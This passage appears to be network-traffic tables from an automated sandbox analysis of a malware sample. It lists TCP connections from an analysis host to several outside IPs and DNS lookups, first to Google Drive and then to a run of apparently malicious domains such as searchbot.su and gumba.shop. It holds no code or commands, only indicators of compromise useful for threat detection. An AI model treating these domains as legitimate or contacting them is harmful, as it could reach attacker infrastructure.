                                                                                                                                                                          Dec 5, 2022 15:20:02.984169006 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:02.984348059 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:03.141504049 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:03.141578913 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:03.141588926 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:03.141670942 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:03.141720057 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:03.142720938 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:03.142828941 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:03.142954111 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:03.300084114 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:03.300142050 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:03.666274071 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:03.866717100 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:04.069257975 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:04.069278955 CET804994366.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:04.069431067 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:04.069431067 CET4994380192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:04.682184935 CET4994480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:04.840936899 CET804994466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:04.841260910 CET4994480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:04.841336966 CET4994480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:04.999974966 CET804994466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:05.151922941 CET804994466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:05.151988029 CET804994466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:05.152326107 CET4994480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:05.152427912 CET4994480192.168.11.2066.29.151.40
                                                                                                                                                                          Dec 5, 2022 15:20:05.311131954 CET804994466.29.151.40192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:10.205341101 CET4994580192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:10.215312958 CET804994564.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:10.215539932 CET4994580192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:10.215637922 CET4994580192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:10.226342916 CET804994564.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:10.226439953 CET804994564.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:10.226564884 CET4994580192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:11.227233887 CET4994580192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:12.243098021 CET4994680192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:12.253732920 CET804994664.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:12.253895998 CET4994680192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:12.254041910 CET4994680192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:12.265235901 CET804994664.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:12.265299082 CET804994664.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:12.265532970 CET4994680192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:13.257894993 CET4994680192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.273732901 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.284462929 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.284773111 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.285463095 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.285583019 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.296030045 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.296113014 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.296163082 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.296243906 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.296331882 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.296435118 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.296521902 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.296587944 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.296915054 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.297044039 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.297236919 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.297419071 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.307080030 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.307410002 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.307419062 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.307478905 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.307590961 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.307713032 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.307756901 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.307885885 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.307889938 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:14.307944059 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.308242083 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.308449030 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.308501959 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.318016052 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.318248987 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.318505049 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.318803072 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.319030046 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.319230080 CET804994764.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:14.319503069 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:15.288872004 CET4994780192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:16.304260015 CET4994880192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:16.314491034 CET804994864.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:16.314997911 CET4994880192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:16.315078974 CET4994880192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:16.366508961 CET804994864.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:16.404421091 CET804994864.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:16.404499054 CET804994864.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:16.404746056 CET4994880192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:16.404889107 CET4994880192.168.11.2064.190.63.111
                                                                                                                                                                          Dec 5, 2022 15:20:16.415548086 CET804994864.190.63.111192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:21.414201975 CET4994980192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:21.577157021 CET8049949192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:21.577574968 CET4994980192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:21.577692986 CET4994980192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:21.740192890 CET8049949192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:21.753614902 CET8049949192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:21.753712893 CET8049949192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:21.754033089 CET4994980192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:22.583950043 CET4994980192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:23.599826097 CET4995280192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:23.763241053 CET8049952192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:23.763654947 CET4995280192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:23.763655901 CET4995280192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:23.926275969 CET8049952192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:23.936568975 CET8049952192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:23.936646938 CET8049952192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:23.936907053 CET4995280192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:24.771131992 CET4995280192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:25.786673069 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:25.949284077 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:25.949615002 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:25.950241089 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:25.950293064 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.112165928 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.112234116 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.112276077 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.112358093 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.112386942 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.112596035 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.112605095 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.112663031 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.112673044 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.112704039 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.113080978 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.113193035 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.274885893 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.274956942 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275003910 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275048971 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275093079 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275142908 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275150061 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.275190115 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275235891 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275278091 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.275283098 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275329113 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275347948 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.275516033 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275566101 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275610924 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.275655031 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.436764956 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.436841011 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.436892033 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.436938047 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.436984062 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.440078974 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.440161943 CET8049953192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:26.440469027 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:26.958101988 CET4995380192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:27.973860979 CET4995480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:28.135519981 CET8049954192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:28.135780096 CET4995480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:28.135880947 CET4995480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:28.297027111 CET8049954192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:28.306195974 CET8049954192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:28.306240082 CET8049954192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:28.306621075 CET4995480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:28.306767941 CET4995480192.168.11.20192.232.217.125
                                                                                                                                                                          Dec 5, 2022 15:20:28.467597008 CET8049954192.232.217.125192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:33.542499065 CET4995580192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:33.685142994 CET8049955208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:33.685473919 CET4995580192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:33.685576916 CET4995580192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:33.828341961 CET8049955208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:35.706182003 CET4995680192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:35.847160101 CET8049956208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:35.847556114 CET4995680192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:35.847645044 CET4995680192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:35.988897085 CET8049956208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:37.877783060 CET4995780192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:38.020560980 CET8049957208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:38.020787001 CET4995780192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:38.021390915 CET4995780192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:38.021472931 CET4995780192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:38.164155960 CET8049957208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.049026012 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.190726042 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.191165924 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.202542067 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.344389915 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.494645119 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.494745970 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.494820118 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.494901896 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.494935989 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.495027065 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.495110035 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.495148897 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.495249033 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.495322943 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.495343924 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.495429993 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.495502949 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.495521069 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.495702028 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.617141008 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.637461901 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.637550116 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.637614965 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.637681961 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.637686014 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.637789011 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.637794018 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.637885094 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.637952089 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.637974977 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.638138056 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.779581070 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.779619932 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.779649019 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.779675961 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.779700994 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:40.779866934 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.779985905 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.780179024 CET4995880192.168.11.20208.91.197.39
                                                                                                                                                                          Dec 5, 2022 15:20:40.921659946 CET8049958208.91.197.39192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:51.139271021 CET4995980192.168.11.20103.91.8.90
                                                                                                                                                                          Dec 5, 2022 15:20:52.140000105 CET4995980192.168.11.20103.91.8.90
                                                                                                                                                                          Dec 5, 2022 15:20:54.139442921 CET4995980192.168.11.20103.91.8.90
                                                                                                                                                                          Dec 5, 2022 15:20:58.154323101 CET4995980192.168.11.20103.91.8.90
                                                                                                                                                                          Dec 5, 2022 15:21:06.168157101 CET4995980192.168.11.20103.91.8.90
                                                                                                                                                                          Dec 5, 2022 15:21:13.198317051 CET4995980192.168.11.20103.91.8.90
                                                                                                                                                                          Dec 5, 2022 15:21:14.197669029 CET4995980192.168.11.20103.91.8.90
                                                                                                                                                                          Dec 5, 2022 15:21:16.212898970 CET4995980192.168.11.20103.91.8.90
                                                                                                                                                                          Dec 5, 2022 15:21:20.227333069 CET4995980192.168.11.20103.91.8.90
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Dec 5, 2022 15:13:33.597953081 CET5289053192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:13:33.607448101 CET53528901.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:13:34.650381088 CET5714953192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:13:34.689038038 CET53571491.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:14:44.956943035 CET6499153192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:14:45.268805027 CET53649911.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:00.577362061 CET6323453192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:15:00.693088055 CET53632341.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:12.543545008 CET6175453192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:15:12.993014097 CET53617541.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:25.509613991 CET5066053192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:15:25.834120035 CET53506601.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:47.692354918 CET6546553192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:15:47.859869957 CET53654651.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:59.774122953 CET6300453192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:15:59.856864929 CET53630041.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:11.125571012 CET6332853192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:16:11.182837009 CET53633281.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:22.402956963 CET6273553192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:16:22.741595984 CET53627351.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:35.087647915 CET5822953192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:16:35.101815939 CET53582291.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:43.148730993 CET4940653192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:16:43.167124987 CET53494061.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:55.224304914 CET5212353192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:16:55.384289980 CET53521231.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:06.565293074 CET6095753192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:17:06.598546982 CET53609571.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:17.781482935 CET5445353192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:17:17.791981936 CET53544531.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:25.842004061 CET5072353192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:17:26.280844927 CET53507231.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:38.620654106 CET5443453192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:17:38.633373022 CET53544341.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:17:50.008730888 CET6279153192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:17:50.498431921 CET53627911.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:50.045459032 CET6371153192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:19:50.068917036 CET53637111.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:10.166099072 CET5424453192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:20:10.204616070 CET53542441.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:33.318905115 CET5364053192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:20:33.541439056 CET53536401.1.1.1192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:20:50.797487020 CET6252853192.168.11.201.1.1.1
                                                                                                                                                                          Dec 5, 2022 15:20:51.138479948 CET53625281.1.1.1192.168.11.20
                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                          Dec 5, 2022 15:13:33.597953081 CET192.168.11.201.1.1.10xf6f4Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:13:34.650381088 CET192.168.11.201.1.1.10xa8cStandard query (0)doc-0g-7s-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:14:44.956943035 CET192.168.11.201.1.1.10x79eStandard query (0)www.labour-office.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:00.577362061 CET192.168.11.201.1.1.10xcca7Standard query (0)www.searchbot.suA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:12.543545008 CET192.168.11.201.1.1.10xef5cStandard query (0)www.youlian.fundA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:25.509613991 CET192.168.11.201.1.1.10xeaf2Standard query (0)www.royaltechglobal.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:47.692354918 CET192.168.11.201.1.1.10x389bStandard query (0)www.xiaoxiuzhen.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:15:59.774122953 CET192.168.11.201.1.1.10xd104Standard query (0)www.gumba.shopA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:11.125571012 CET192.168.11.201.1.1.10x799dStandard query (0)www.botbillionsblaze.websiteA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:22.402956963 CET192.168.11.201.1.1.10x594bStandard query (0)www.005404.comA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:35.087647915 CET192.168.11.201.1.1.10xc6bfStandard query (0)www.westinotion.techA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:43.148730993 CET192.168.11.201.1.1.10xcbdfStandard query (0)www.gouldent.siteA (IP address)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2022 15:16:55.224304914 CET192.168.11.201.1.1.10xdea9Standard query (0)www.apidachicago.orgA (IP address)IN (0x0001)false
